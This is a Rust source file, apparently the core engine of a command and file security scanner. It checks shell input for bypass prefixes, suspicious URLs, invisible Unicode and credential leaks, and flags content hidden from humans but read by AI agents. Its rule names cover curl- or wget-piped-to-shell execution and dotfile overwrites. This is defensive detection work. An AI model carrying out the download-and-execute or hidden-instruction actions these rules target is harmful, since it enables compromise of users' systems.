tirith_core/
engine.rs

1use std::time::Instant;
2
3use crate::extract::{self, ScanContext};
4use crate::normalize;
5use crate::policy::Policy;
6use crate::tokenize::ShellType;
7use crate::verdict::{Finding, Timings, Verdict};
8
/// Extract the raw (un-normalized) path component from a URL string.
///
/// Everything after the first `://` is considered. The query (`?…`) and fragment
/// (`#…`) are cut off *before* the path's leading `/` is located, so a slash that
/// only appears inside the query or fragment (e.g. `http://host?next=/admin`) is
/// never mistaken for the start of the path.
///
/// Returns `None` when `raw` contains no `://` or when the URL has no path.
fn extract_raw_path_from_url(raw: &str) -> Option<String> {
    let (_, after_scheme) = raw.split_once("://")?;

    // Drop the query/fragment first; only the authority + path remain.
    let authority_and_path = after_scheme
        .find(['?', '#'])
        .map_or(after_scheme, |end| &after_scheme[..end]);

    // The path starts at the first slash after the authority.
    let path_start = authority_and_path.find('/')?;
    Some(authority_and_path[path_start..].to_string())
}
22
23/// Analysis context passed through the pipeline.
///
/// Built by the caller and handed to `analyze`, which reads the fields below to
/// decide which tiers and rule families run.
24pub struct AnalysisContext {
    /// Text to analyze; fed to the tier-1 scan, URL extraction and the rule checks.
25    pub input: String,
    /// Shell dialect used when splitting/tokenizing `input`.
26    pub shell: ShellType,
    /// Which pipeline to run (`Exec`, `Paste` or `FileScan`).
27    pub scan_context: ScanContext,
    /// Raw bytes of the input, when available. Used for the byte-level scan in
    /// paste context and preferred over `input` bytes in file-scan context.
28    pub raw_bytes: Option<Vec<u8>>,
    /// Selects which bypass policy flag is consulted (interactive vs. non-interactive).
29    pub interactive: bool,
    /// Working directory handed to policy discovery and the command rules.
30    pub cwd: Option<String>,
31    /// File path being scanned (only populated for ScanContext::FileScan).
32    pub file_path: Option<std::path::PathBuf>,
33    /// Only populated for ScanContext::FileScan. When None, configfile checks use
34    /// `file_path`'s parent as implicit repo root.
35    pub repo_root: Option<String>,
36    /// True when `file_path` was explicitly provided by the user as a config file.
37    pub is_config_override: bool,
38    /// Clipboard HTML content for rich-text paste analysis.
39    /// Only populated when `tirith paste --html <path>` is used.
40    pub clipboard_html: Option<String>,
41}
42
/// Report whether a `VAR=VALUE` word assigns `0` to `TIRITH`.
///
/// The word is split at its first `=`. The variable name must be exactly `TIRITH`
/// (case-sensitive). Any single or double quote characters at either end of the
/// value are trimmed before it is compared with `0`, so `TIRITH='0'` and
/// `TIRITH="0"` both match.
fn is_tirith_zero_assignment(word: &str) -> bool {
    match word.split_once('=') {
        Some(("TIRITH", value)) => {
            value.trim_matches(|c: char| matches!(c, '\'' | '"')) == "0"
        }
        _ => false,
    }
}
54
55/// Check if the input contains an inline `TIRITH=0` bypass prefix.
56/// Handles POSIX bare prefix (`TIRITH=0 cmd`), env wrappers (`env -i TIRITH=0 cmd`),
57/// and PowerShell env syntax (`$env:TIRITH="0"; cmd`).
/// A cmd.exe `set TIRITH=0 & cmd` prefix is recognized as well (see the last check).
///
/// Only the words returned by `split_raw_words` (the first segment of `input`) are
/// inspected. Returns `true` as soon as a bypass assignment is found.
58fn find_inline_bypass(input: &str, shell: ShellType) -> bool {
59    use crate::tokenize;
60
    // POSIX/Fish: bail out unless the input is exactly one segment and contains no
    // unquoted `&`.
61    if matches!(shell, ShellType::Posix | ShellType::Fish) {
62        let segments = tokenize::tokenize(input, shell);
63        if segments.len() != 1 || has_unquoted_ampersand(input, shell) {
64            return false;
65        }
66    }
67
68    let words = split_raw_words(input, shell);
69    if words.is_empty() {
70        return false;
71    }
72
73    // POSIX / Fish: VAR=VALUE prefix or env wrapper
74    // (Fish 3.1+ and all POSIX shells support `TIRITH=0 command`)
    // NOTE: Cases 1 and 2 below are not gated on `shell`; they run for every shell type.
75
76    // Case 1: Leading VAR=VALUE assignments before the command
77    let mut idx = 0;
78    while idx < words.len() && tokenize::is_env_assignment(&words[idx]) {
79        if is_tirith_zero_assignment(&words[idx]) {
80            return true;
81        }
82        idx += 1;
83    }
84
85    // Case 2: First real word is `env` — parse env-style args
86    if idx < words.len() {
        // Compare only the basename (text after the last `/`), with quote characters
        // trimmed from both ends, so `/usr/bin/env` and `"env"` also match.
87        let cmd = words[idx].rsplit('/').next().unwrap_or(&words[idx]);
88        let cmd = cmd.trim_matches(|c: char| c == '\'' || c == '"');
89        if cmd == "env" {
90            idx += 1;
91            while idx < words.len() {
92                let w = &words[idx];
93                if w == "--" {
94                    idx += 1;
95                    // After --, remaining are VAR=VALUE or command
96                    break;
97                }
98                if tokenize::is_env_assignment(w) {
99                    if is_tirith_zero_assignment(w) {
100                        return true;
101                    }
102                    idx += 1;
103                    continue;
104                }
105                if w.starts_with('-') {
106                    if w.starts_with("--") {
                        // A value-taking long flag written without `=` consumes the
                        // next word as its value; otherwise skip just the flag.
107                        if env_long_flag_takes_value(w) && !w.contains('=') {
108                            idx += 2;
109                        } else {
110                            idx += 1;
111                        }
112                        continue;
113                    }
114                    // Short flags that take a separate value arg
115                    if w == "-u" || w == "-C" || w == "-S" {
116                        idx += 2;
117                        continue;
118                    }
                    // Any other short flag is skipped on its own.
119                    idx += 1;
120                    continue;
121                }
122                // Non-flag, non-assignment = the command, stop
123                break;
124            }
125            // Check remaining words after -- for TIRITH=0
            // (`idx` may already be past the end if a flag consumed the last word;
            // the bounds check in the loop condition covers that.)
126            while idx < words.len() && tokenize::is_env_assignment(&words[idx]) {
127                if is_tirith_zero_assignment(&words[idx]) {
128                    return true;
129                }
130                idx += 1;
131            }
132        }
133    }
134
135    // PowerShell: $env:TIRITH="0" or $env:TIRITH = "0" (before first ;)
136    if shell == ShellType::PowerShell {
        // Single-word form: any word of the first segment may be the assignment.
137        for word in &words {
138            if is_powershell_tirith_bypass(word) {
139                return true;
140            }
141        }
142        // Multi-word: $env:TIRITH = "0" (space around =)
143        if words.len() >= 3 {
144            for window in words.windows(3) {
145                if is_powershell_env_ref(&window[0], "TIRITH")
146                    && window[1] == "="
147                    && strip_surrounding_quotes(&window[2]) == "0"
148                {
149                    return true;
150                }
151            }
152        }
153    }
154
155    // Cmd: "set TIRITH=0 & ..." or 'set "TIRITH=0" & ...'
156    // In cmd.exe, `set TIRITH="0"` stores the literal `"0"` (with quotes) as the
157    // value, so we must NOT strip inner quotes from the value. Only bare `TIRITH=0`
158    // and whole-token-quoted `"TIRITH=0"` are real bypasses.
159    if shell == ShellType::Cmd && words.len() >= 2 {
        // `set` is matched case-insensitively; the variable name below is compared
        // case-sensitively.
160        let first = words[0].to_lowercase();
161        if first == "set" {
162            let second = strip_double_quotes_only(&words[1]);
163            if let Some((name, val)) = second.split_once('=') {
164                if name == "TIRITH" && val == "0" {
165                    return true;
166                }
167            }
168        }
169    }
170
171    false
172}
173
/// Report whether a long `env` option is one that takes a value.
///
/// Only the option name is considered: anything from the first `=` onward is
/// ignored, so both `--unset` and `--unset=NAME` return `true`.
fn env_long_flag_takes_value(flag: &str) -> bool {
    let option_name = match flag.find('=') {
        Some(eq_pos) => &flag[..eq_pos],
        None => flag,
    };
    ["--unset", "--chdir", "--split-string"].contains(&option_name)
}
178
179/// Check if a word is `$env:TIRITH=0` with optional quotes around the value.
180/// The `$env:` prefix is matched case-insensitively (PowerShell convention).
181fn is_powershell_tirith_bypass(word: &str) -> bool {
182    if !word.starts_with('$') || word.len() < "$env:TIRITH=0".len() {
183        return false;
184    }
185    let after_dollar = &word[1..];
186    if !after_dollar
187        .get(..4)
188        .is_some_and(|s| s.eq_ignore_ascii_case("env:"))
189    {
190        return false;
191    }
192    let after_env = &after_dollar[4..];
193    if !after_env
194        .get(..7)
195        .is_some_and(|s| s.eq_ignore_ascii_case("TIRITH="))
196    {
197        return false;
198    }
199    let value = &after_env[7..];
200    strip_surrounding_quotes(value) == "0"
201}
202
/// Report whether `word` is exactly the PowerShell env reference `$env:<var_name>`.
///
/// The leading `$` must be present; the `env:` scope and the variable name are both
/// compared ASCII-case-insensitively. Nothing may follow the name, so an assignment
/// such as `$env:NAME=0` does not match.
fn is_powershell_env_ref(word: &str, var_name: &str) -> bool {
    let Some(after_sigil) = word.strip_prefix('$') else {
        return false;
    };
    match (after_sigil.get(..4), after_sigil.get(4..)) {
        (Some(scope), Some(name)) => {
            scope.eq_ignore_ascii_case("env:") && name.eq_ignore_ascii_case(var_name)
        }
        _ => false,
    }
}
217
/// Remove one layer of matching quotes (`"…"` or `'…'`) from around `s`.
///
/// The opening and closing quote must be the same character; otherwise, or when
/// `s` is shorter than two characters, `s` is returned unchanged.
fn strip_surrounding_quotes(s: &str) -> &str {
    for quote in ['"', '\''] {
        let unwrapped = s
            .strip_prefix(quote)
            .and_then(|rest| rest.strip_suffix(quote));
        if let Some(inner) = unwrapped {
            return inner;
        }
    }
    s
}
228
/// Remove one layer of surrounding double quotes from `s`, if present.
///
/// Single quotes are left alone (for Cmd they are literal characters). A string
/// that does not both start and end with `"`, or that consists of a lone `"`,
/// is returned unchanged.
fn strip_double_quotes_only(s: &str) -> &str {
    s.strip_prefix('"')
        .and_then(|rest| rest.strip_suffix('"'))
        .unwrap_or(s)
}
237
238/// Split input into raw words respecting quotes (for bypass/self-invocation parsing).
239/// Unlike tokenize(), this doesn't split on pipes/semicolons — just whitespace-splits
240/// the raw input to inspect the first segment's words.
241///
242/// Shell-aware: POSIX uses backslash as escape inside double-quotes and bare context;
243/// PowerShell uses backtick (`` ` ``) instead.
244fn split_raw_words(input: &str, shell: ShellType) -> Vec<String> {
245    let escape_char = match shell {
246        ShellType::PowerShell => '`',
247        ShellType::Cmd => '^',
248        _ => '\\',
249    };
250
251    // Take only up to the first unquoted pipe/semicolon/&&/||
252    let mut words = Vec::new();
253    let mut current = String::new();
254    let chars: Vec<char> = input.chars().collect();
255    let len = chars.len();
256    let mut i = 0;
257
258    while i < len {
259        let ch = chars[i];
260        match ch {
261            ' ' | '\t' if !current.is_empty() => {
262                words.push(current.clone());
263                current.clear();
264                i += 1;
265                while i < len && (chars[i] == ' ' || chars[i] == '\t') {
266                    i += 1;
267                }
268            }
269            ' ' | '\t' => {
270                i += 1;
271            }
272            '|' | '\n' | '&' => break, // Stop at segment boundary
273            ';' if shell != ShellType::Cmd => break,
274            '#' if shell == ShellType::PowerShell => break,
275            '\'' if shell != ShellType::Cmd => {
276                current.push(ch);
277                i += 1;
278                while i < len && chars[i] != '\'' {
279                    current.push(chars[i]);
280                    i += 1;
281                }
282                if i < len {
283                    current.push(chars[i]);
284                    i += 1;
285                }
286            }
287            '"' => {
288                current.push(ch);
289                i += 1;
290                while i < len && chars[i] != '"' {
291                    if chars[i] == escape_char && i + 1 < len {
292                        current.push(chars[i]);
293                        current.push(chars[i + 1]);
294                        i += 2;
295                    } else {
296                        current.push(chars[i]);
297                        i += 1;
298                    }
299                }
300                if i < len {
301                    current.push(chars[i]);
302                    i += 1;
303                }
304            }
305            c if c == escape_char && i + 1 < len => {
306                current.push(chars[i]);
307                current.push(chars[i + 1]);
308                i += 2;
309            }
310            _ => {
311                current.push(ch);
312                i += 1;
313            }
314        }
315    }
316    if !current.is_empty() {
317        words.push(current);
318    }
319    words
320}
321
322/// Check if input contains an unquoted `&` (backgrounding operator).
323fn has_unquoted_ampersand(input: &str, shell: ShellType) -> bool {
324    let escape_char = match shell {
325        ShellType::PowerShell => '`',
326        ShellType::Cmd => '^',
327        _ => '\\',
328    };
329    let chars: Vec<char> = input.chars().collect();
330    let len = chars.len();
331    let mut i = 0;
332    while i < len {
333        match chars[i] {
334            '\'' if shell != ShellType::Cmd => {
335                i += 1;
336                while i < len && chars[i] != '\'' {
337                    i += 1;
338                }
339                if i < len {
340                    i += 1;
341                }
342            }
343            '"' => {
344                i += 1;
345                while i < len && chars[i] != '"' {
346                    if chars[i] == escape_char && i + 1 < len {
347                        i += 2;
348                    } else {
349                        i += 1;
350                    }
351                }
352                if i < len {
353                    i += 1;
354                }
355            }
356            c if c == escape_char && i + 1 < len => {
357                i += 2; // skip escaped char
358            }
359            '&' => return true,
360            _ => i += 1,
361        }
362    }
363    false
364}
365
366/// Run the tiered analysis pipeline.
///
/// - Tier 0 records whether a bypass was requested, either through the `TIRITH`
///   environment variable being `0` or through an inline prefix in `ctx.input`.
/// - Tier 1 runs the fast, I/O-free scans. If none of them trigger, the function
///   returns `Verdict::allow_fast(1, …)` immediately (before any bypass handling).
/// - Tier 2 loads policy. If a bypass was requested and the partial policy allows
///   it for the current interactive/non-interactive mode, the bypass is honored:
///   the verdict is logged via `crate::audit::log_verdict` and returned.
/// - Tier 3 runs the rule families for the scan context, applies policy severity
///   overrides, blocklist/allowlist filtering and enrichment, then builds the
///   verdict from the remaining findings.
///
/// Timings for every tier that ran are reported in the verdict, in milliseconds.
367pub fn analyze(ctx: &AnalysisContext) -> Verdict {
368    let start = Instant::now();
369
370    // Tier 0: Check bypass flag
371    let tier0_start = Instant::now();
372    let bypass_env = std::env::var("TIRITH").ok().as_deref() == Some("0");
373    let bypass_inline = find_inline_bypass(&ctx.input, ctx.shell);
374    let bypass_requested = bypass_env || bypass_inline;
375    let tier0_ms = tier0_start.elapsed().as_secs_f64() * 1000.0;
376
377    // Tier 1: Fast scan (no I/O)
378    let tier1_start = Instant::now();
379
380    // Step 1 (paste only): byte-level scan for control chars
    // Without raw bytes there is nothing to scan, so this stays false.
381    let byte_scan_triggered = if ctx.scan_context == ScanContext::Paste {
382        if let Some(ref bytes) = ctx.raw_bytes {
383            let scan = extract::scan_bytes(bytes);
384            scan.has_ansi_escapes
385                || scan.has_control_chars
386                || scan.has_bidi_controls
387                || scan.has_zero_width
388                || scan.has_invalid_utf8
389                || scan.has_unicode_tags
390                || scan.has_variation_selectors
391                || scan.has_invisible_math_operators
392                || scan.has_invisible_whitespace
393        } else {
394            false
395        }
396    } else {
397        false
398    };
399
400    // Step 2: URL-like regex scan
401    let regex_triggered = extract::tier1_scan(&ctx.input, ctx.scan_context);
402
403    // Step 3 (exec only): check for bidi/zero-width/invisible chars even without URLs
404    let exec_bidi_triggered = if ctx.scan_context == ScanContext::Exec {
405        let scan = extract::scan_bytes(ctx.input.as_bytes());
406        scan.has_bidi_controls
407            || scan.has_zero_width
408            || scan.has_unicode_tags
409            || scan.has_variation_selectors
410            || scan.has_invisible_math_operators
411            || scan.has_invisible_whitespace
412    } else {
413        false
414    };
415
416    let tier1_ms = tier1_start.elapsed().as_secs_f64() * 1000.0;
417
418    // If nothing triggered, fast exit
    // (no policy is loaded and the bypass request is not consulted on this path)
419    if !byte_scan_triggered && !regex_triggered && !exec_bidi_triggered {
420        let total_ms = start.elapsed().as_secs_f64() * 1000.0;
421        return Verdict::allow_fast(
422            1,
423            Timings {
424                tier0_ms,
425                tier1_ms,
426                tier2_ms: None,
427                tier3_ms: None,
428                total_ms,
429            },
430        );
431    }
432
433    // Tier 2: Policy + data loading (deferred I/O)
434    let tier2_start = Instant::now();
435
436    if bypass_requested {
437        // Load partial policy to check bypass settings
438        let policy = Policy::discover_partial(ctx.cwd.as_deref());
        // Interactive and non-interactive sessions are governed by separate flags.
439        let allow_bypass = if ctx.interactive {
440            policy.allow_bypass_env
441        } else {
442            policy.allow_bypass_env_noninteractive
443        };
444
445        if allow_bypass {
446            let tier2_ms = tier2_start.elapsed().as_secs_f64() * 1000.0;
447            let total_ms = start.elapsed().as_secs_f64() * 1000.0;
448            let mut verdict = Verdict::allow_fast(
449                2,
450                Timings {
451                    tier0_ms,
452                    tier1_ms,
453                    tier2_ms: Some(tier2_ms),
454                    tier3_ms: None,
455                    total_ms,
456                },
457            );
458            verdict.bypass_requested = true;
459            verdict.bypass_honored = true;
460            verdict.interactive_detected = ctx.interactive;
461            verdict.policy_path_used = policy.path.clone();
462            // Log bypass to audit (include custom DLP patterns from partial policy)
463            crate::audit::log_verdict(
464                &verdict,
465                &ctx.input,
466                None,
467                None,
468                &policy.dlp_custom_patterns,
469            );
470            return verdict;
471        }
        // Bypass requested but not allowed by policy: fall through to full analysis.
472    }
473
474    let mut policy = Policy::discover(ctx.cwd.as_deref());
475    policy.load_user_lists();
476    policy.load_org_lists(ctx.cwd.as_deref());
477    let tier2_ms = tier2_start.elapsed().as_secs_f64() * 1000.0;
478
479    // Tier 3: Full analysis
480    let tier3_start = Instant::now();
481    let mut findings = Vec::new();
482
483    // Track extracted URLs for allowlist/blocklist (Exec/Paste only)
    // (stays empty for FileScan, so the blocklist loop below is a no-op there)
484    let mut extracted = Vec::new();
485
486    if ctx.scan_context == ScanContext::FileScan {
487        // FileScan: byte scan + configfile rules ONLY.
488        // Does NOT run command/env/URL-extraction rules.
        // Raw bytes are preferred; otherwise the bytes of `input` are scanned.
489        let byte_input = if let Some(ref bytes) = ctx.raw_bytes {
490            bytes.as_slice()
491        } else {
492            ctx.input.as_bytes()
493        };
494        let byte_findings = crate::rules::terminal::check_bytes(byte_input);
495        findings.extend(byte_findings);
496
497        // Config file detection rules
498        findings.extend(crate::rules::configfile::check(
499            &ctx.input,
500            ctx.file_path.as_deref(),
501            ctx.repo_root.as_deref().map(std::path::Path::new),
502            ctx.is_config_override,
503        ));
504
505        // Code file pattern scanning rules
506        if crate::rules::codefile::is_code_file(
507            ctx.file_path.as_deref().and_then(|p| p.to_str()),
508            &ctx.input,
509        ) {
510            findings.extend(crate::rules::codefile::check(
511                &ctx.input,
512                ctx.file_path.as_deref().and_then(|p| p.to_str()),
513            ));
514        }
515
516        // Rendered content rules (file-type gated)
517        if crate::rules::rendered::is_renderable_file(ctx.file_path.as_deref()) {
518            // PDF files get their own parser
            // (detected by a case-insensitive `.pdf` extension)
519            let is_pdf = ctx
520                .file_path
521                .as_deref()
522                .and_then(|p| p.extension())
523                .and_then(|e| e.to_str())
524                .map(|e| e.eq_ignore_ascii_case("pdf"))
525                .unwrap_or(false);
526
527            if is_pdf {
528                let pdf_bytes = ctx.raw_bytes.as_deref().unwrap_or(ctx.input.as_bytes());
529                findings.extend(crate::rules::rendered::check_pdf(pdf_bytes));
530            } else {
531                findings.extend(crate::rules::rendered::check(
532                    &ctx.input,
533                    ctx.file_path.as_deref(),
534                ));
535            }
536        }
537    } else {
538        // Exec/Paste: standard pipeline
539
540        // Run byte-level rules for paste context
541        if ctx.scan_context == ScanContext::Paste {
542            if let Some(ref bytes) = ctx.raw_bytes {
543                let byte_findings = crate::rules::terminal::check_bytes(bytes);
544                findings.extend(byte_findings);
545            }
546            // Check for hidden multiline content in pasted text
547            let multiline_findings = crate::rules::terminal::check_hidden_multiline(&ctx.input);
548            findings.extend(multiline_findings);
549
550            // Check clipboard HTML for hidden content (rich-text paste analysis)
551            if let Some(ref html) = ctx.clipboard_html {
552                let clipboard_findings =
553                    crate::rules::terminal::check_clipboard_html(html, &ctx.input);
554                findings.extend(clipboard_findings);
555            }
556        }
557
558        // Invisible character checks for exec context. Paste input is covered by the
        // byte-level rules above (when raw bytes are present), so only Exec is
        // handled in this branch.
559        if ctx.scan_context == ScanContext::Exec {
560            let byte_input = ctx.input.as_bytes();
561            let scan = extract::scan_bytes(byte_input);
562            if scan.has_bidi_controls
563                || scan.has_zero_width
564                || scan.has_unicode_tags
565                || scan.has_variation_selectors
566                || scan.has_invisible_math_operators
567                || scan.has_invisible_whitespace
568            {
569                let byte_findings = crate::rules::terminal::check_bytes(byte_input);
570                // Only keep invisible-char findings for exec context
571                findings.extend(byte_findings.into_iter().filter(|f| {
572                    matches!(
573                        f.rule_id,
574                        crate::verdict::RuleId::BidiControls
575                            | crate::verdict::RuleId::ZeroWidthChars
576                            | crate::verdict::RuleId::UnicodeTags
577                            | crate::verdict::RuleId::InvisibleMathOperator
578                            | crate::verdict::RuleId::VariationSelector
579                            | crate::verdict::RuleId::InvisibleWhitespace
580                    )
581                }));
582            }
583        }
584
585        // Extract and analyze URLs
586        extracted = extract::extract_urls(&ctx.input, ctx.shell);
587
588        for url_info in &extracted {
589            // Normalize path if available — use raw extracted URL's path for non-ASCII detection
590            // since url::Url percent-encodes non-ASCII during parsing
591            let raw_path = extract_raw_path_from_url(&url_info.raw);
592            let normalized_path = url_info.parsed.path().map(normalize::normalize_path);
593
594            // Run all rule categories
595            let hostname_findings = crate::rules::hostname::check(&url_info.parsed, &policy);
596            findings.extend(hostname_findings);
597
598            let path_findings = crate::rules::path::check(
599                &url_info.parsed,
600                normalized_path.as_ref(),
601                raw_path.as_deref(),
602            );
603            findings.extend(path_findings);
604
605            let transport_findings =
606                crate::rules::transport::check(&url_info.parsed, url_info.in_sink_context);
607            findings.extend(transport_findings);
608
609            let ecosystem_findings = crate::rules::ecosystem::check(&url_info.parsed);
610            findings.extend(ecosystem_findings);
611        }
612
613        // Run command-shape rules on full input
614        let command_findings = crate::rules::command::check(
615            &ctx.input,
616            ctx.shell,
617            ctx.cwd.as_deref(),
618            ctx.scan_context,
619        );
620        findings.extend(command_findings);
621
622        // Run credential leak detection rules
623        let cred_findings =
624            crate::rules::credential::check(&ctx.input, ctx.shell, ctx.scan_context);
625        findings.extend(cred_findings);
626
627        // Run environment rules
628        let env_findings = crate::rules::environment::check(&crate::rules::environment::RealEnv);
629        findings.extend(env_findings);
630
631        // Policy-driven network deny/allow
        // (skipped entirely when the policy has no deny entries)
632        if !policy.network_deny.is_empty() {
633            let net_findings = crate::rules::command::check_network_policy(
634                &ctx.input,
635                ctx.shell,
636                &policy.network_deny,
637                &policy.network_allow,
638            );
639            findings.extend(net_findings);
640        }
641    }
642
643    // Custom YAML detection rules
    // (run for every scan context, including FileScan; compiled on each call)
644    if !policy.custom_rules.is_empty() {
645        let compiled = crate::rules::custom::compile_rules(&policy.custom_rules);
646        let custom_findings = crate::rules::custom::check(&ctx.input, ctx.scan_context, &compiled);
647        findings.extend(custom_findings);
648    }
649
650    // Apply policy severity overrides
651    for finding in &mut findings {
652        if let Some(override_sev) = policy.severity_override(&finding.rule_id) {
653            finding.severity = override_sev;
654        }
655    }
656
657    // Filter by allowlist/blocklist
658    // Blocklist: if any extracted URL matches blocklist, escalate to Block
    // (a Critical finding is added after the severity overrides above were applied,
    // so it is not affected by them)
659    for url_info in &extracted {
660        if policy.is_blocklisted(&url_info.raw) {
661            findings.push(Finding {
662                rule_id: crate::verdict::RuleId::PolicyBlocklisted,
663                severity: crate::verdict::Severity::Critical,
664                title: "URL matches blocklist".to_string(),
665                description: format!("URL '{}' matches a blocklist pattern", url_info.raw),
666                evidence: vec![crate::verdict::Evidence::Url {
667                    raw: url_info.raw.clone(),
668                }],
669                human_view: None,
670                agent_view: None,
671                mitre_id: None,
672                custom_rule_id: None,
673            });
674        }
675    }
676
677    // Allowlist: remove findings for URLs that match allowlist
678    // (blocklist takes precedence — if blocklisted, findings remain)
679    if !policy.allowlist.is_empty() || !policy.allowlist_rules.is_empty() {
680        let blocklisted_urls: Vec<&str> = extracted
681            .iter()
682            .filter(|u| policy.is_blocklisted(&u.raw))
683            .map(|u| u.raw.as_str())
684            .collect();
685
686        findings.retain(|f| {
687            let urls_in_evidence: Vec<&str> = f
688                .evidence
689                .iter()
690                .filter_map(|e| match e {
691                    crate::verdict::Evidence::Url { raw } => Some(raw.as_str()),
692                    _ => None,
693                })
694                .collect();
695
            // Findings without URL evidence are never removed by the allowlist.
696            if urls_in_evidence.is_empty() {
697                return true;
698            }
699
            // Per-rule allowlisting: matches on the built-in rule id or, for custom
            // rules, on the custom rule id.
700            let rule_allowlisted = |url: &str| {
701                policy.is_allowlisted_for_rule(&f.rule_id.to_string(), url)
702                    || f.custom_rule_id.as_deref().is_some_and(|custom_rule_id| {
703                        policy.is_allowlisted_for_rule(custom_rule_id, url)
704                    })
705            };
706
707            // Keep if any referenced URL is blocklisted. Otherwise only drop the
708            // finding when every referenced URL is allowlisted for this finding.
709            urls_in_evidence
710                .iter()
711                .any(|url| blocklisted_urls.contains(url))
712                || !urls_in_evidence
713                    .iter()
714                    .all(|url| policy.is_allowlisted(url) || rule_allowlisted(url))
715        });
716    }
717
718    // Enrichment is always enabled in the single-tier runtime.
719    enrich_pro(&mut findings);
720    enrich_team(&mut findings);
721
722    // Early-access suppression is disabled in the single-tier runtime.
723    crate::rule_metadata::filter_early_access(&mut findings, crate::license::Tier::Enterprise);
724
725    let tier3_ms = tier3_start.elapsed().as_secs_f64() * 1000.0;
726    let total_ms = start.elapsed().as_secs_f64() * 1000.0;
727
728    let mut verdict = Verdict::from_findings(
729        findings,
730        3,
731        Timings {
732            tier0_ms,
733            tier1_ms,
734            tier2_ms: Some(tier2_ms),
735            tier3_ms: Some(tier3_ms),
736            total_ms,
737        },
738    );
    // `bypass_requested` may be true here when the request was made but not honored.
739    verdict.bypass_requested = bypass_requested;
740    verdict.interactive_detected = ctx.interactive;
741    verdict.policy_path_used = policy.path.clone();
742    verdict.urls_extracted_count = Some(extracted.len());
743
744    verdict
745}
746
747// ---------------------------------------------------------------------------
748// Paranoia tier filtering (Phase 15)
749// ---------------------------------------------------------------------------
750
751/// Filter a verdict's findings by paranoia level.
752///
753/// This is an output-layer filter — the engine always detects everything.
754/// CLI/MCP call this after `analyze()` to reduce noise at lower paranoia levels.
755///
756/// - Paranoia 1-2: Medium+ findings only
757/// - Paranoia 3: also show Low findings
758/// - Paranoia 4: also show Info findings
///
/// Levels below 1 behave like 1-2, and levels above 4 behave like 4.
/// After filtering, `verdict.action` is recomputed from the findings that remain.
759pub fn filter_findings_by_paranoia(verdict: &mut Verdict, paranoia: u8) {
760    retain_by_paranoia(&mut verdict.findings, paranoia);
761    verdict.action = recalculate_action(&verdict.findings);
762}
763
764/// Filter a Vec<Finding> by paranoia level.
765/// Same logic as `filter_findings_by_paranoia` but operates on raw findings.
/// No verdict action is recalculated here; only the vector is filtered in place.
766pub fn filter_findings_by_paranoia_vec(findings: &mut Vec<Finding>, paranoia: u8) {
767    retain_by_paranoia(findings, paranoia);
768}
769
770/// Recalculate verdict action from the current findings (same logic as `Verdict::from_findings`).
771fn recalculate_action(findings: &[Finding]) -> crate::verdict::Action {
772    use crate::verdict::{Action, Severity};
773    if findings.is_empty() {
774        return Action::Allow;
775    }
776    let max_severity = findings
777        .iter()
778        .map(|f| f.severity)
779        .max()
780        .unwrap_or(Severity::Low);
781    match max_severity {
782        Severity::Critical | Severity::High => Action::Block,
783        Severity::Medium | Severity::Low => Action::Warn,
784        Severity::Info => Action::Allow,
785    }
786}
787
788/// Shared paranoia retention logic.
789fn retain_by_paranoia(findings: &mut Vec<Finding>, paranoia: u8) {
790    let effective = paranoia.min(4);
791
792    findings.retain(|f| match f.severity {
793        crate::verdict::Severity::Info => effective >= 4,
794        crate::verdict::Severity::Low => effective >= 3,
795        _ => true, // Medium/High/Critical always shown
796    });
797}
798
799// ---------------------------------------------------------------------------
800// Finding enrichment
801// ---------------------------------------------------------------------------
802
803/// Pro enrichment: dual-view, decoded content, cloaking diffs, line numbers.
804fn enrich_pro(findings: &mut [Finding]) {
805    for finding in findings.iter_mut() {
806        match finding.rule_id {
807            // Rendered content findings: show what human sees vs what agent processes
808            crate::verdict::RuleId::HiddenCssContent => {
809                finding.human_view =
810                    Some("Content hidden via CSS — invisible in rendered view".into());
811                finding.agent_view = Some(format!(
812                    "AI agent sees full text including CSS-hidden content. {}",
813                    evidence_summary(&finding.evidence)
814                ));
815            }
816            crate::verdict::RuleId::HiddenColorContent => {
817                finding.human_view =
818                    Some("Text blends with background — invisible to human eye".into());
819                finding.agent_view = Some(format!(
820                    "AI agent reads text regardless of color contrast. {}",
821                    evidence_summary(&finding.evidence)
822                ));
823            }
824            crate::verdict::RuleId::HiddenHtmlAttribute => {
825                finding.human_view =
826                    Some("Elements marked hidden/aria-hidden — not displayed".into());
827                finding.agent_view = Some(format!(
828                    "AI agent processes hidden element content. {}",
829                    evidence_summary(&finding.evidence)
830                ));
831            }
832            crate::verdict::RuleId::HtmlComment => {
833                finding.human_view = Some("HTML comments not rendered in browser".into());
834                finding.agent_view = Some(format!(
835                    "AI agent reads comment content as context. {}",
836                    evidence_summary(&finding.evidence)
837                ));
838            }
839            crate::verdict::RuleId::MarkdownComment => {
840                finding.human_view = Some("Markdown comments not rendered in preview".into());
841                finding.agent_view = Some(format!(
842                    "AI agent processes markdown comment content. {}",
843                    evidence_summary(&finding.evidence)
844                ));
845            }
846            crate::verdict::RuleId::PdfHiddenText => {
847                finding.human_view = Some("Sub-pixel text invisible in PDF viewer".into());
848                finding.agent_view = Some(format!(
849                    "AI agent extracts all text including sub-pixel content. {}",
850                    evidence_summary(&finding.evidence)
851                ));
852            }
853            crate::verdict::RuleId::ClipboardHidden => {
854                finding.human_view =
855                    Some("Hidden content in clipboard HTML not visible in paste preview".into());
856                finding.agent_view = Some(format!(
857                    "AI agent processes full clipboard including hidden HTML. {}",
858                    evidence_summary(&finding.evidence)
859                ));
860            }
861            _ => {}
862        }
863    }
864}
865
866/// Summarize evidence entries for enrichment text.
867fn evidence_summary(evidence: &[crate::verdict::Evidence]) -> String {
868    let details: Vec<&str> = evidence
869        .iter()
870        .filter_map(|e| {
871            if let crate::verdict::Evidence::Text { detail } = e {
872                Some(detail.as_str())
873            } else {
874                None
875            }
876        })
877        .take(3)
878        .collect();
879    if details.is_empty() {
880        String::new()
881    } else {
882        format!("Details: {}", details.join("; "))
883    }
884}
885
886/// MITRE ATT&CK technique mapping for built-in rules.
887fn mitre_id_for_rule(rule_id: crate::verdict::RuleId) -> Option<&'static str> {
888    use crate::verdict::RuleId;
889    match rule_id {
890        // Execution
891        RuleId::PipeToInterpreter
892        | RuleId::CurlPipeShell
893        | RuleId::WgetPipeShell
894        | RuleId::HttpiePipeShell
895        | RuleId::XhPipeShell => Some("T1059.004"), // Command and Scripting Interpreter: Unix Shell
896
897        // Persistence
898        RuleId::DotfileOverwrite => Some("T1546.004"), // Event Triggered Execution: Unix Shell Config
899
900        // Defense Evasion
901        RuleId::BidiControls
902        | RuleId::UnicodeTags
903        | RuleId::ZeroWidthChars
